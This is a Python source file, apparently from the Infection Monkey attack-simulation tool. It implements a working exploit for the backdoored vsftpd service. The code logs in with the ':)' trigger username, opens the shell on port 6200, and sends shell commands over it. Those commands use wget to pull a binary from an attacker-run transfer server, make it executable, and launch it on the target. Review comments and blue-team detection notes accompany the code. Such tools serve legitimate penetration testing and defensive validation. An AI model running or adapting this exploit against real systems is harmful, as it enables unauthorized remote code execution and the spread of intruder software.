monkey/monkey/infection_monkey/exploit/vsftpd.py


import StringIO
import logging
import paramiko
import socket
import time
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network.tools import check_tcp_port
from logging import getLogger
# Module-level logger shared by everything in this file.
LOG = logging.getLogger(__name__)
__author__ = 'D3fa1t'

# Control port of the FTP service that the exploiter connects to first.
FTP_PORT = 21
# NOTE(review): not referenced in the visible part of this file.
TRANSFER_UPDATE_RATE = 15
# Raw FTP login lines sent verbatim by the exploiter. The USER value ends in
# ":)"; these exact bytes on the FTP control channel are what a network
# sensor would observe when this exploiter runs.
USERNAME = b'USER letmein:)\n'
PASSWORD = b'PASS please\n'
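class VSFTPDExploiter(HostExploiter):
    """Exploiter for Linux hosts running a backdoored vsftpd service.

    The sequence performed by ``exploit_host`` is, in order:

    1. An FTP login on ``FTP_PORT`` using the fixed ``USERNAME`` /
       ``PASSWORD`` lines (the user name ends in ``:)``).
    2. A TCP connection to port 6200 on the same host, over which shell
       commands are written as plain text.
    3. ``uname -m``, a ``wget`` of the monkey binary from the transfer
       server created by ``HTTPTools.create_locked_transfer``, a
       ``chmod +x`` and a backgrounded launch of the dropper path.

    For blue teams validating coverage, each step is observable: the
    ``:)`` user name on the FTP control channel, the inbound connection to
    TCP 6200, and the ``wget``/``chmod`` process activity on the host.
    """

    _TARGET_OS_TYPE = ['linux']

    def __init__(self, host):
        """Store per-run state and read the exploiter configuration.

        :param host: target host object, passed on to ``HostExploiter``.
        """
        self._update_timestamp = 0
        super(VSFTPDExploiter, self).__init__(host)
        self.skip_exist = self._config.skip_exploit_if_file_exist

    def exploit_host(self):
        """Run the trigger / connect / deploy sequence against ``self.host``.

        :return: ``True`` once the launch command has been written to the
                 port-6200 socket, ``False`` if that socket could not be
                 used or no suitable monkey binary was found.
        """
        # Stage 1: FTP login. A failure here is logged but not fatal; the
        # original code also carried on to stage 2 in that case.
        ftp_socket = None
        try:
            LOG.info('Attempting to trigger backdoor...')
            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # NOTE(review): no timeout is set on this socket in this method,
            # so unless a default timeout is configured elsewhere a silent
            # peer blocks recv() indefinitely - confirm.
            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
            # The banner and the reply are read only to keep the dialogue in
            # step. They are not decoded: the text is discarded, and a
            # non-UTF-8 banner would raise an uncaught UnicodeDecodeError.
            ftp_socket.recv(128)
            # Attempt to login to trigger backdoor
            ftp_socket.send(USERNAME)
            ftp_socket.recv(128)
            ftp_socket.send(PASSWORD)
            time.sleep(1)
            LOG.info('Triggered backdoor')
        except socket.error:
            LOG.error('Failed to trigger backdoor on %s', self.host.ip_addr)
        finally:
            # Close on every path so a failed attempt does not leak the fd.
            if ftp_socket is not None:
                ftp_socket.close()

        # Stage 2: talk to the listener on port 6200.
        backdoor_socket = None
        try:
            LOG.info('Attempting to connect to backdoor...')
            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            backdoor_socket.connect((self.host.ip_addr, 6200))
            LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)

            command = str.encode("uname -m" + '\n')
            backdoor_socket.send(command)
            response = backdoor_socket.recv(128).decode('utf-8')
            LOG.info('Response for uname -m: %s', response)
            machine = response.lower().strip()
            if machine:
                # command execution is successful
                self.host.os['machine'] = machine
                self.host.os['type'] = 'linux'
            else:
                # NOTE(review): the run continues even though command
                # execution was not confirmed - verify this is intended.
                LOG.info("Failed to execute command uname -m on victim %r ", self.host)

            src_path = get_target_monkey(self.host)
            LOG.info("src for suitable monkey executable for host %r is %s", self.host, src_path)
            if not src_path:
                LOG.info("Can't find suitable monkey executable for host %r", self.host)
                return False

            # copy the monkey into the machine
            # NOTE(review): http_thread is never used after this call in the
            # visible code; check whether the transfer server must be
            # stopped or joined by the caller.
            http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
            dropper_target_path_linux = self._config.dropper_target_path_linux
            LOG.info("Download link for monkey is %s", http_path)

            # download the monkey
            # NOTE(review): both values are interpolated into a shell line
            # unquoted; they come from configuration / the local transfer
            # server here, but a path containing shell metacharacters would
            # change the command.
            download_command = '/usr/bin/wget %s -O %s;' % (
                http_path, dropper_target_path_linux)
            LOG.info("Download_command is %s", download_command)
            command = str.encode(str(download_command) + '\n')
            backdoor_socket.send(command)
            LOG.info("waiting 3 seconds for download to be completed")
            time.sleep(3)  # wait till the file is downloaded

            # change it to executable
            execute_command = "/bin/chmod +x %s" % dropper_target_path_linux
            LOG.info("Execute_command is %s", execute_command)
            command = str.encode(str(execute_command) + '\n')
            backdoor_socket.send(command)

            # run the monkey
            cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
            cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
            cmdline += "&"
            command = str.encode(str(cmdline) + '\n')
            backdoor_socket.send(command)
            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                     self._config.dropper_target_path_linux, self.host, cmdline)
            # NOTE(review): success is recorded once the commands are sent;
            # nothing here checks that the download or launch worked, so the
            # report can overstate the result.
            self._exploit_info['Vulnerability'] = {"Success": "True"}
        except socket.error as e:
            LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr)
            LOG.error('Error Connecting to backdoor. Error: %s', e)
            return False
        finally:
            # Explicit close instead of relying on garbage collection.
            if backdoor_socket is not None:
                backdoor_socket.close()
        return True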